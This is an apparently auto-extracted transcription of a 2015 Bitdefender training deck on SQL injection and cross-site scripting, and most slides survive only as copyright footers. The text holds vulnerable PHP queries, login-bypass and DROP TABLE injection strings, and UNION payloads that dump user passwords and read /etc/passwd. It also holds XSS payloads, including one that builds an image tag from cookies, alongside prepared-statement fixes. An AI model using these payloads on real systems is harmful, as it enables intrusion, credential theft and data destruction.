Copyright Bitdefender 2015 / 12/15/2015 2

Transcription

1

2 Copyright Bitdefender 2015 / 12/15/2015 2

3 Protocol Server name / IP Port Path Query string (GET data) Copyright Bitdefender 2015 / 12/15/2015 3

4 Copyright Bitdefender 2015 / 12/15/2015 4

5 Copyright Bitdefender 2015 / 12/15/2015 5

6 Copyright Bitdefender 2015 / 12/15/2015 6

7 on=detail&view_act=upd_wishlist&id=33 Copyright Bitdefender 2015 / 12/15/2015 7

8 SELECT * FROM users WHERE user= raul AND pass= parola $usr = $_POST[ username ]; $pwd = $_POST[ password ]; $sql = SELECT * FROM users WHERE user= $usr AND pass= $pwd ; $result = mysqli->query($sql); Copyright Bitdefender 2015 / 12/15/2015 8

9 raul # SELECT * FROM users WHERE user= raul # AND pass= parola Copyright Bitdefender 2015 / 12/15/2015 9

10 raul # admin' OR 1=1 # invalid_user' OR 1=1 LIMIT 1 # invalid_user' OR 1=1; DROP TABLE users # # -- Copyright Bitdefender 2015 / 12/15/

11 $sql = "SELECT * FROM users WHERE id=". $_GET['id']; 0 ORDER BY 5 0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL 0 UNION ALL SELECT 1,2,3,4,5 0 UNION ALL SELECT 1, admin,null,null,null Copyright Bitdefender 2015 / 12/15/

12 0 UNION ALL SELECT 0 UNION ALL SELECT 1,2,3,4,table_name FROM information_schema.tables 0 UNION ALL SELECT 1,2,3,4,column_name FROM information_schema.columns WHERE table_name= users 0 UNION ALL SELECT 1,2,3,4,CONCAT(user,0x3a,pass) FROM users 0 UNION ALL SELECT 1,2,3,4,load_file( /etc/passwd ) Copyright Bitdefender 2015 / 12/15/

13 INTO OUTFILE DUMPFILE INTO DUMPFILE Copyright Bitdefender 2015 / 12/15/

14 $result = mysqli->query( SELECT * FROM accesses WHERE user_agent LIKE %Chrome% GROUP BY user_agent LIMIT 1 ); $most_used = mysqli_fetch_array($result); $result = mysqli->query( SELECT * FROM accesses WHERE user_agent=. $most_used[ user_agent ]. ); Copyright Bitdefender 2015 / 12/15/

15 Copyright Bitdefender 2015 / 12/15/

16 $id = $_COOKIE["mid"]; mysql_query("select MessageID, Subject FROM messages WHERE MessageID = '$id'"); Copyright Bitdefender 2015 / 12/15/

17 # mysql_real_escape_string($sql); // MySQL $dbh->quote($sql); // Perl DBD Copyright Bitdefender 2015 / 12/15/

18 Copyright Bitdefender 2015 / 12/15/

19 Copyright Bitdefender 2015 / 12/15/

20 $res = mysqli->query("select * FROM users WHERE (user='$user' AND pass='$pass')"); $statement = $db->prepare("select * FROM users WHERE (user=? AND pass=?);"); $statement->bind_param("ss", $user, $pass); $statement->execute(); $user $pass Copyright Bitdefender 2015 / 12/15/

21 Copyright Bitdefender 2015 / 12/15/

22 id=10 AND 1=1 id=10; INSERT INTO... for_sql_injection_(otg-inpval-005) Copyright Bitdefender 2015 / 12/15/

23 Copyright Bitdefender 2015 / 12/15/

24 Copyright Bitdefender 2015 / 12/15/

25 attacker.com bank.com bank.com bank.com Copyright Bitdefender 2015 / 12/15/

26 Copyright Bitdefender 2015 / 12/15/

27 <script>alert('xss!')</script> Copyright Bitdefender 2015 / 12/15/

28 var Copyright Bitdefender 2015 / 12/15/

29 var pos=document.url.indexof("var=")+4; document.write(document.url.substring(pos,document.url.length)); Copyright Bitdefender 2015 / 12/15/

30 Copyright Bitdefender 2015 / 12/15/

31 Copyright Bitdefender 2015 / 12/15/

32 " + alert('xss!') + " <img src=' + unescape(document.cookie) + " '> Copyright Bitdefender 2015 / 12/15/

33 Copyright Bitdefender 2015 / 12/15/

34 '"><svg/onload=prompt(1337)> Copyright Bitdefender 2015 / 12/15/

35 Copyright Bitdefender 2015 / 12/15/

36 Copyright Bitdefender 2015 / 12/15/

37 Copyright Bitdefender 2015 / 12/15/

38 Copyright Bitdefender 2015 / 12/15/

39 Copyright Bitdefender 2015 / 12/15/

40 Copyright Bitdefender 2015 / 12/15/

41 Copyright Bitdefender 2015 / 12/15/

42 Copyright Bitdefender 2015 / 12/15/

43 Copyright Bitdefender 2015 / 12/15/

44 Copyright Bitdefender 2015 / 12/15/

45 Copyright Bitdefender 2015 / 12/15/

46 Copyright Bitdefender 2015 / 12/15/

47 SP_Top_Ten_Project Copyright Bitdefender 2015 / 12/15/

48